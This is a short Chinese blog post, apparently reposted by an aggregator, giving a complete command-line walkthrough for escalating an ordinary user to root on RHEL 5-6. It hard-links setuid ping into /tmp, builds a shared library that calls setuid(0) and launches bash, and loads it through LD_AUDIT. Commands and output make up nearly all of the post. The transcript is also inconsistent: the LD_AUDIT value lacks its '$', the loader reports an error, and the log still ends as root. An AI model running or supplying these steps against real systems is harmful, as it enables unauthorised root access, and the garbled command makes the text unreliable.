RHEL5-6普通用户提权root
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了RHEL5-6普通用户提权root相关的知识,希望对你有一定的参考价值。
[[email protected] ~]# whoami ##我是谁
root
[[email protected] ~]# useradd putong
[[email protected] ~]# su - putong
[[email protected] ~]$ whoami
putong
[[email protected] ~]$ ll -d /tmp/
drwxrwxrwt. 3 root root 4096 12月 2 03:11 /tmp/
[[email protected] ~]$ cd /tmp/
[[email protected] tmp]$ mkdir ceshi
[[email protected] tmp]$ ln /bin/ping /tmp/ceshi/ceshi ##创建一个硬链接
[[email protected] tmp]$ ll !$
ll /tmp/ceshi/ceshi
-rwsr-xr-x. 2 root root 40760 9月 26 2013 /tmp/ceshi/ceshi
[[email protected] tmp]$ exec 3< /tmp/ceshi/ceshi ##系统调用exec是以新的进程去代替原来的进程,但进程的PID保持不变。因此,可以这样认为,exec系统调用并没有创建新的
进程,只是替换了原来进程上下文的内容。原进程的代码段,数据段,堆栈段被新的进程所代替。
[[email protected] tmp]$ ll /proc/$$/fd/3
lr-x------ 1 putong putong 64 12月 2 03:19 /proc/1346/fd/3 -> /tmp/ceshi/ceshi
[[email protected] tmp]$ rm -rf /tmp/ceshi/
[[email protected] tmp]$ ll /proc/1346/fd/3
lr-x------ 1 putong putong 64 12月 2 03:19 /proc/1346/fd/3 -> /tmp/ceshi/ceshi (deleted)
[[email protected] tmp]$ vim root.c ##创建一个c语言脚本
void __attribute__((constructor)) init() ##注意;__这是两个_下划线
{
setuid(0);
system("/bin/bash");
}
:wq
[[email protected] tmp]$ gcc -w -fPIC -shared -o /tmp/ceshi root.c ## -o 输出
[[email protected] tmp]$ ll /tmp/ceshi
-rwxrwxr-x 1 putong putong 6017 12月 2 03:25 /tmp/ceshi
[[email protected] tmp]$ LD_AUDIT="ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object ‘ORIGIN‘ cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[[email protected] ~]#
[[email protected] ~]# whoami
root
本文出自 “11628205” 博客,请务必保留此出处http://11638205.blog.51cto.com/11628205/1878828
以上是关于RHEL5-6普通用户提权root的主要内容,如果未能解决你的问题,请参考以下文章